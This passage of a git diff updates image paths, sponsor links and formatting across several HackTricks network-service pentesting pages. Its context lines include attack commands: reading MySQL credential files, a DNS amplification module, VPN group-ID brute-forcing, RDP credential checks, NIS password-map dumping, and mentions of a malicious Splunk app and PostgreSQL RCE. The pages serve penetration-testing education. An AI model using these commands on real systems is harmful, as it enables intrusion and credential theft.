@@ -1,12 +1,12 @@
 # 8086 - Pentesting InfluxDB
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=8086-pentesting-influxdb) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=8086-pentesting-influxdb" %}
 
 <details>
 
@@ -153,10 +153,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=8086-pentesting-influxdb) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=8086-pentesting-influxdb" %}
diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md
index 64c49e5b7..a82907d4c 100644
--- a/network-services-pentesting/8089-splunkd.md
+++ b/network-services-pentesting/8089-splunkd.md
@@ -96,7 +96,7 @@ We need the `.bat` file, which will run when the application is deployed and exe
 
 The next step is to choose `Install app from file` and upload the application.
 
-<figure><img src="../.gitbook/assets/image (665).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (668).png" alt=""><figcaption></figcaption></figure>
 
 Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
 
diff --git a/network-services-pentesting/9200-pentesting-elasticsearch.md b/network-services-pentesting/9200-pentesting-elasticsearch.md
index cc509f046..663c10af5 100644
--- a/network-services-pentesting/9200-pentesting-elasticsearch.md
+++ b/network-services-pentesting/9200-pentesting-elasticsearch.md
@@ -34,7 +34,7 @@ During the indexing process, Elasticsearch stores the documents and constructs t
 
 The protocol used to access Elasticsearch is **HTTP**. When you access it via HTTP you will find some interesting information: `http://10.10.10.115:9200/`
 
-![](<../.gitbook/assets/image (291).png>)
+![](<../.gitbook/assets/image (294).png>)
 
 If you don't see that response accessing `/` see the following section.
 
@@ -124,13 +124,13 @@ yellow open   bank    eSVpNfCfREyYoVigNWcrMw   5   1       1000            0
 
 To obtain **information about which kind of data is saved inside an index** you can access: `http://host:9200/<index>` from example in this case `http://10.10.10.115:9200/bank`
 
-![](<../.gitbook/assets/image (339).png>)
+![](<../.gitbook/assets/image (342).png>)
 
 ### Dump index
 
 If you want to **dump all the contents** of an index you can access: `http://host:9200/<index>/_search?pretty=true` like `http://10.10.10.115:9200/bank/_search?pretty=true`
 
-![](<../.gitbook/assets/image (911).png>)
+![](<../.gitbook/assets/image (914).png>)
 
 _Take a moment to compare the contents of the each document (entry) inside the bank index and the fields of this index that we saw in the previous section._
 
@@ -147,7 +147,7 @@ Remember that in this case the **default limit of 10** results will be applied.
 
 If you are looking for some information you can do a **raw search on all the indices** going to `http://host:9200/_search?pretty=true&q=<search_term>` like in `http://10.10.10.115:9200/_search?pretty=true&q=Rockwell`
 
-![](<../.gitbook/assets/image (332).png>)
+![](<../.gitbook/assets/image (335).png>)
 
 If you want just to **search on an index** you can just **specify** it on the **path**: `http://host:9200/<index>/_search?pretty=true&q=<search_term>`
 
@@ -173,11 +173,11 @@ That cmd will create a **new index** called `bookindex` with a document of type
 
 Notice how the **new index appears now in the list**:
 
-![](<../.gitbook/assets/image (127).png>)
+![](<../.gitbook/assets/image (130).png>)
 
 And note the **automatically created properties**:
 
-![](<../.gitbook/assets/image (431).png>)
+![](<../.gitbook/assets/image (434).png>)
 
 ## Automatic Enumeration
 
diff --git a/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/network-services-pentesting/ipsec-ike-vpn-pentesting.md
index 3089ecd6d..7e9ef696b 100644
--- a/network-services-pentesting/ipsec-ike-vpn-pentesting.md
+++ b/network-services-pentesting/ipsec-ike-vpn-pentesting.md
@@ -100,7 +100,7 @@ You could also try to brute force transformations with [**ikeforce**](https://gi
 ./ikeforce.py <IP> # No parameters are required for scan -h for additional help
 ```
 
-![](<../.gitbook/assets/image (614).png>)
+![](<../.gitbook/assets/image (617).png>)
 
 In **DH Group: 14 = 2048-bit MODP** and **15 = 3072-bit**\
 **2 = HMAC-SHA = SHA1 (in this case). The `--trans` format is $Enc,$Hash,$Auth,$DH**
@@ -152,7 +152,7 @@ ike-scan -P -M -A -n fakeID <IP>
 
 If **no hash is returned**, then probably this method of brute forcing will work. **If some hash is returned, this means that a fake hash is going to be sent back for a fake ID, so this method won't be reliable** to brute-force the ID. For example, a fake hash could be returned (this happens in modern versions):
 
-![](<../.gitbook/assets/image (914).png>)
+![](<../.gitbook/assets/image (917).png>)
 
 But if as I have said, no hash is returned, then you should try to brute-force common group names using ike-scan.
 
@@ -201,7 +201,7 @@ pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
 
 (From the book **Network Security Assessment: Know Your Network**): It is also possible to obtain valid usernames by sniffing the connection between the VPN client and server, as the first aggressive mode packet containing the client ID is sent in the clear
 
-![](<../.gitbook/assets/image (888).png>)
+![](<../.gitbook/assets/image (891).png>)
 
 ## Capturing & cracking the hash
 
diff --git a/network-services-pentesting/pentesting-dns.md b/network-services-pentesting/pentesting-dns.md
index 777e978d3..5b84ea518 100644
--- a/network-services-pentesting/pentesting-dns.md
+++ b/network-services-pentesting/pentesting-dns.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -195,13 +195,13 @@ dig google.com A @<IP>
 
 **Non available**:
 
-![](<../.gitbook/assets/image (120).png>)
+![](<../.gitbook/assets/image (123).png>)
 
 **Available**:
 
-![](<../.gitbook/assets/image (143).png>)
+![](<../.gitbook/assets/image (146).png>)
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -322,7 +322,7 @@ Entry_6:
   Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' 
 ```
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-ftp/README.md b/network-services-pentesting/pentesting-ftp/README.md
index cb8110128..e786765c9 100644
--- a/network-services-pentesting/pentesting-ftp/README.md
+++ b/network-services-pentesting/pentesting-ftp/README.md
@@ -182,7 +182,7 @@ wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/
 * **`PASV`** This will open a passive connection and will indicate the user were he can connects
 * **`PUT /tmp/file.txt`** Upload indicated file to the FTP
 
-![](<../../.gitbook/assets/image (383).png>)
+![](<../../.gitbook/assets/image (386).png>)
 
 ## FTPBounce attack
 
diff --git a/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md b/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md
index 74faa7803..c37735ddc 100644
--- a/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md
+++ b/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md
@@ -36,15 +36,15 @@ Other ways to support HackTricks:
 
 Example Using **PORT** (port 8080 of 172.32.80.80 is open and port 7777 is closed):
 
-![](<../../.gitbook/assets/image (238).png>)
+![](<../../.gitbook/assets/image (241).png>)
 
 Same example using **`EPRT`**(authentication omitted in the image):
 
-![](<../../.gitbook/assets/image (535).png>)
+![](<../../.gitbook/assets/image (539).png>)
 
 Open port using `EPRT` instead of `LIST` (different env)
 
-![](<../../.gitbook/assets/image (872).png>)
+![](<../../.gitbook/assets/image (875).png>)
 
 ### **nmap**
 
diff --git a/network-services-pentesting/pentesting-imap.md b/network-services-pentesting/pentesting-imap.md
index 0c6647e4f..ec5ca8ff4 100644
--- a/network-services-pentesting/pentesting-imap.md
+++ b/network-services-pentesting/pentesting-imap.md
@@ -117,7 +117,7 @@ Logout
 apt install evolution
 ```
 
-![](<../.gitbook/assets/image (1030).png>)
+![](<../.gitbook/assets/image (1033).png>)
 
 ### CURL
 
diff --git a/network-services-pentesting/pentesting-irc.md b/network-services-pentesting/pentesting-irc.md
index 5b2234762..0be8051ec 100644
--- a/network-services-pentesting/pentesting-irc.md
+++ b/network-services-pentesting/pentesting-irc.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Basic Information
 
@@ -107,10 +107,9 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
 
 * `looking up your hostname`
 
-
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -129,7 +128,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/network-services-pentesting/pentesting-ldap.md b/network-services-pentesting/pentesting-ldap.md
index b81c34a42..81474c86f 100644
--- a/network-services-pentesting/pentesting-ldap.md
+++ b/network-services-pentesting/pentesting-ldap.md
@@ -340,7 +340,7 @@ You can download a graphical interface with LDAP server here: [http://www.jxplor
 
 By default is is installed in: _/opt/jxplorer_
 
-![](<../.gitbook/assets/image (479).png>)
+![](<../.gitbook/assets/image (482).png>)
 
 ### Godap
 
diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
index e3791cd00..8b4f698c8 100644
--- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -325,7 +325,7 @@ MSSQL could allow you to execute **scripts in Python and/or R**. These code will
 
 Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
 
-![](<../../.gitbook/assets/image (390).png>)
+![](<../../.gitbook/assets/image (393).png>)
 
 Example using configured python to perform several actions:
 
diff --git a/network-services-pentesting/pentesting-mysql.md b/network-services-pentesting/pentesting-mysql.md
index 897a02e19..b35aefac6 100644
--- a/network-services-pentesting/pentesting-mysql.md
+++ b/network-services-pentesting/pentesting-mysql.md
@@ -286,7 +286,7 @@ grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_na
 
 You can enable logging of mysql queries inside `/etc/mysql/my.cnf` uncommenting the following lines:
 
-![](<../.gitbook/assets/image (896).png>)
+![](<../.gitbook/assets/image (899).png>)
 
 ### Useful files
 
diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md
index b645539bf..8d96240a9 100644
--- a/network-services-pentesting/pentesting-ntp.md
+++ b/network-services-pentesting/pentesting-ntp.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -108,7 +108,7 @@ Entry_2:
 
 ​
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md
index 6fc0e6a81..cc19279a9 100644
--- a/network-services-pentesting/pentesting-postgresql.md
+++ b/network-services-pentesting/pentesting-postgresql.md
@@ -1,12 +1,12 @@
 # 5432,5433 - Pentesting Postgresql
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=pentesting-postgresql) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pentesting-postgresql" %}
 
 <details>
 
@@ -467,7 +467,7 @@ The following RCE vectors are especially useful in constrained SQLi contexts, as
 
 The **configuration file** of PostgreSQL is **writable** by the **postgres user**, which is the one running the database, so as **superuser**, you can write files in the filesystem, and therefore you can **overwrite this file.**
 
-![](<../.gitbook/assets/image (319).png>)
+![](<../.gitbook/assets/image (322).png>)
 
 #### **RCE with ssl\_passphrase\_command**
 
@@ -631,7 +631,7 @@ In [**this writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem
 
 When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
 
-<figure><img src="../.gitbook/assets/image (533).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (537).png" alt=""><figcaption></figcaption></figure>
 
 Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
 
@@ -753,7 +753,7 @@ WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
 
 And then **execute commands**:
 
-<figure><img src="../.gitbook/assets/image (646).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (649).png" alt=""><figcaption></figcaption></figure>
 
 ### Pass Burteforce with PL/pgSQL
 
@@ -843,10 +843,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=pentesting-postgresql) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pentesting-postgresql" %}
diff --git a/network-services-pentesting/pentesting-rdp.md b/network-services-pentesting/pentesting-rdp.md
index c27bdf47d..270b140cc 100644
--- a/network-services-pentesting/pentesting-rdp.md
+++ b/network-services-pentesting/pentesting-rdp.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -75,7 +75,7 @@ rdp\_check.py from impacket let you check if some credentials are valid for a RD
 rdp_check <domain>/<name>:<password>@<IP>
 ```
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -168,7 +168,7 @@ Entry_2:
   Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
 ```
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-remote-gdbserver.md b/network-services-pentesting/pentesting-remote-gdbserver.md
index 139876a52..2f3b59698 100644
--- a/network-services-pentesting/pentesting-remote-gdbserver.md
+++ b/network-services-pentesting/pentesting-remote-gdbserver.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -199,7 +199,7 @@ RemoteCmd()
 ```
 {% endcode %}
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-rlogin.md b/network-services-pentesting/pentesting-rlogin.md
index 3e0932225..13d182313 100644
--- a/network-services-pentesting/pentesting-rlogin.md
+++ b/network-services-pentesting/pentesting-rlogin.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -51,7 +51,7 @@ rlogin <IP> -l <username>
 find / -name .rhosts
 ```
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/network-services-pentesting/pentesting-rpcbind.md b/network-services-pentesting/pentesting-rpcbind.md
index 8a00929aa..47d688d20 100644
--- a/network-services-pentesting/pentesting-rpcbind.md
+++ b/network-services-pentesting/pentesting-rpcbind.md
@@ -14,11 +14,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 ## Basic Information
 
 **Portmapper** is a service that is utilized for mapping network service ports to **RPC** (Remote Procedure Call) program numbers. It acts as a critical component in **Unix-based systems**, facilitating the exchange of information between these systems. The **port** associated with **Portmapper** is frequently scanned by attackers as it can reveal valuable information. This information includes the type of **Unix Operating System (OS)** running and details about the services that are available on the system. Additionally, **Portmapper** is commonly used in conjunction with **NFS (Network File System)**, **NIS (Network Information Service)**, and other **RPC-based services** to manage network services effectively.
@@ -39,7 +38,7 @@ nmap -sSUC -p111 192.168.10.1
 
 Sometimes it doesn't give you any information, in other occasions you will get something like this:
 
-![](<../.gitbook/assets/image (550).png>)
+![](<../.gitbook/assets/image (553).png>)
 
 ### Shodan
 
@@ -49,7 +48,7 @@ Sometimes it doesn't give you any information, in other occasions you will get s
 
 If you find the service NFS then probably you will be able to list and download(and maybe upload) files:
 
-![](<../.gitbook/assets/image (869).png>)
+![](<../.gitbook/assets/image (872).png>)
 
 Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol.
 
@@ -57,7 +56,7 @@ Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more ab
 
 Exploring **NIS** vulnerabilities involves a two-step process, starting with the identification of the service `ypbind`. The cornerstone of this exploration is uncovering the **NIS domain name**, without which progress is halted.
 
-![](<../.gitbook/assets/image (856).png>)
+![](<../.gitbook/assets/image (859).png>)
 
 The exploration journey begins with the installation of necessary packages (`apt-get install nis`). The subsequent step requires using `ypwhich` to confirm the NIS server's presence by pinging it with the domain name and server IP, ensuring these elements are anonymized for security.
 
@@ -85,7 +84,7 @@ ypcat –d <domain-name> –h <server-ip> passwd.byname
 
 If you find the **rusersd** service listed like this:
 
-![](<../.gitbook/assets/image (1038).png>)
+![](<../.gitbook/assets/image (1041).png>)
 
 You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
 
@@ -101,11 +100,10 @@ When conducting a **nmap scan** and discovering open NFS ports with port 111 bei
 
 * Practice these techniques in the [**Irked HTB machine**](https://app.hackthebox.com/machines/Irked).
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 ## HackTricks Automatic Commands
 
 ```
@@ -132,7 +130,6 @@ Entry_3:
   Command: nmap -sSUC -p 111 {IP}
 ```
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/network-services-pentesting/pentesting-sap.md b/network-services-pentesting/pentesting-sap.md
index 850a02e3c..420e7d3c0 100644
--- a/network-services-pentesting/pentesting-sap.md
+++ b/network-services-pentesting/pentesting-sap.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -322,7 +322,7 @@ bizploit> start
 * [https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/](https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/)
 * [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/network-services-pentesting/pentesting-smb/README.md b/network-services-pentesting/pentesting-smb/README.md
index 97e28f1f6..919147e6d 100644
--- a/network-services-pentesting/pentesting-smb/README.md
+++ b/network-services-pentesting/pentesting-smb/README.md
@@ -519,11 +519,11 @@ This happens with the functions:
 
 Which are used by some browsers and tools (like Skype)
 
-![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (355).png>)
+![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (358).png>)
 
 ### SMBTrap using MitMf
 
-![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (889).png>)
+![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (892).png>)
 
 ## NTLM Theft
 
diff --git a/network-services-pentesting/pentesting-smtp/README.md b/network-services-pentesting/pentesting-smtp/README.md
index 5a60266a4..c83ff37e5 100644
--- a/network-services-pentesting/pentesting-smtp/README.md
+++ b/network-services-pentesting/pentesting-smtp/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -188,7 +188,7 @@ smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
